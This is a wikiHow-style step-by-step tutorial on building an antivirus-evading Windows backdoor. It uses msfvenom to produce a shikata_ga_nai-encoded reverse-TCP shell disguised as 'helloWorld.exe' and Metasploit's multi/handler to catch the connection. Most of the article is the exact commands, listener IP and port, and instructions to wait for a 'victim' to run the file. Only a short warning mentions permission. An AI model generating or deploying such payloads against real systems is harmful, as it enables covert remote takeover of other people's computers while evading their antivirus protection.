How to Create a Nearly Undetectable Backdoor using MSFvenom in Kali Linux

A backdoor is used to bypass security mechanisms, often secretly and mostly undetectably. Using MSFvenom, the combination of msfpayload and msfencode, it's possible to create a backdoor that connects back to the attacker by using reverse shell TCP. In order to develop a backdoor, you need to change the signature of your malware to evade any antivirus software. Complete this project on a pair of computers that you have permission to access, and in the process, you'll learn more about computer security and how this kind of backdoor works.

Steps

  1. Image titled Create a Nearly Undetectable Backdoor using MSFvenom in Kali Linux Step 1
    1
    Start up Kali and fire up the Terminal console.
  2. Image titled Create a Nearly Undetectable Backdoor using MSFvenom in Kali Linux Step 2
    2
    Type ifconfig to display the interface and check your IP address.
    Advertisement
  3. Image titled Create a Nearly Undetectable Backdoor using MSFvenom in Kali Linux Step 3
    3
    Type msfvenom -l encoders to show the list of encoders.
    • You will use x86/shikata_ga_nai as the encoder.
  4. Image titled Create a Nearly Undetectable Backdoor using MSFvenom in Kali Linux Step 4
    4
    Type "msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe > helloWorld.exe
    • -a x86 --platform windows designates architecture to use.
    • -p windows/shell/reverse_tcp designates the payloads to embed.
    • LHOST designates the listener IP address.
    • LPORT designates the listener port.
    • -b "\x00" designates to avoid bad character (null bytes).
    • -e x86/shikata_ga_nai designates the encoders name.
    • -f exe > helloWorld.exe designates format output.
  5. Image titled Create a Nearly Undetectable Backdoor using MSFvenom in Kali Linux Step 5
    5
    Type msfconsole to activate the Metasploit.
    • Now you have generated your backdoor. When the victim clicks on helloWorld.exe, the shell payload that is embedded will be activated and make a connection back to your system. In order to receive the connection, you have to open the multi-handler in Metasploit and set the payloads.
  6. Image titled Create a Nearly Undetectable Backdoor using MSFvenom in Kali Linux Step 6
    6
    Type use exploit/multi/handler.
  7. Image titled Create a Nearly Undetectable Backdoor using MSFvenom in Kali Linux Step 7
    7
    Type set payload windows/shell/reverse_tcp.
  8. Image titled Create a Nearly Undetectable Backdoor using MSFvenom in Kali Linux Step 8
    8
    Type show options to check the module.
  9. Image titled Create a Nearly Undetectable Backdoor using MSFvenom in Kali Linux Step 9
    9
    Type set LHOST 192.168.48.129.
    • "LHOST" designates the listener IP address.
  10. Image titled Create a Nearly Undetectable Backdoor using MSFvenom in Kali Linux Step 10
    10
    Type set LPORT 4444.
    • "LPORT" designates the listener port.
  11. Image titled Create a Nearly Undetectable Backdoor using MSFvenom in Kali Linux Step 11
    11
    Type run and wait for the connection from victim's machine.
  12. Image titled Create a Nearly Undetectable Backdoor using MSFvenom in Kali Linux Step 12
    12
    Wait for the victim to click on helloWorld.exe. Then you will be successfully connected to the victim's machine.
    13. Advertisement

Community Q&A

  • Question
    What do I do if an error pops up when creating the exploit?
    MOHMMD ELFA
    MOHMMD ELFA
    Community Answer
    Make sure you did everything correctly and try again. Make sure your are running Kali Linux.
Advertisement

Warnings

  • This article is for educational purpose only. Hacking without authorization or permission is unethical and often illegal.
    ⧼thumbs_response⧽
Advertisement

Things You'll Need

  • Kali Linux
  • Windows
  • Virtual machine
    • VirtualBox
    • VMware

You Might Also Like

Hack
How to
Hack
Hack Gmail
How to
Hack Gmail
Reset a BIOS Password
How to
Reset a BIOS Password
Use Cheat Engine
How to
Use Cheat Engine
Hack Games
How to
Hack Games
Find Out a PasswordHow to Find Out a Password: 8 Tricks to Gain Access to Accounts
Hack a Website with Basic HTML Coding
How to
Hack a Website with Basic HTML Coding
Crash Your Computer Using a Batch File
How to
Crash Your Computer Using a Batch File
Hack Into a School Computer
How to
Hack Into a School Computer
Hack LanSchool
How to
Hack LanSchool
Hack Into a Computer Without an Account
How to
Hack Into a Computer Without an Account
Hack a PlayStation Portable
How to
Hack a PlayStation Portable
Hack a Coke Machine
How to
Hack a Coke Machine
Hack a Database
How to
Hack a Database
Advertisement

References

  1. OCCUPYTHEWEB. Metasploit for the Aspiring Hacker, Part 5 (Msfvenom). from http://null-byte.wonderhowto.com/how-to/hack-like-pro-metasploit-for-aspiring-hacker-part-5-msfvenom-0159520/
  2. thelightcosine. The Odd Couple: Metasploit and Antivirus Solutions (Dec 13, 2012). from https://community.rapid7.com/community/metasploit/blog/2012/12/14/the-odd-couple-metasploit-and-antivirus-solutions

About This Article

wikiHow is a “wiki,” similar to Wikipedia, which means that many of our articles are co-written by multiple authors. To create this article, volunteer authors worked to edit and improve it over time. This article has been viewed 102,488 times.
How helpful is this?
Co-authors: 8
Updated: December 6, 2019
Views: 102,488
Categories: Hacks
Advertisement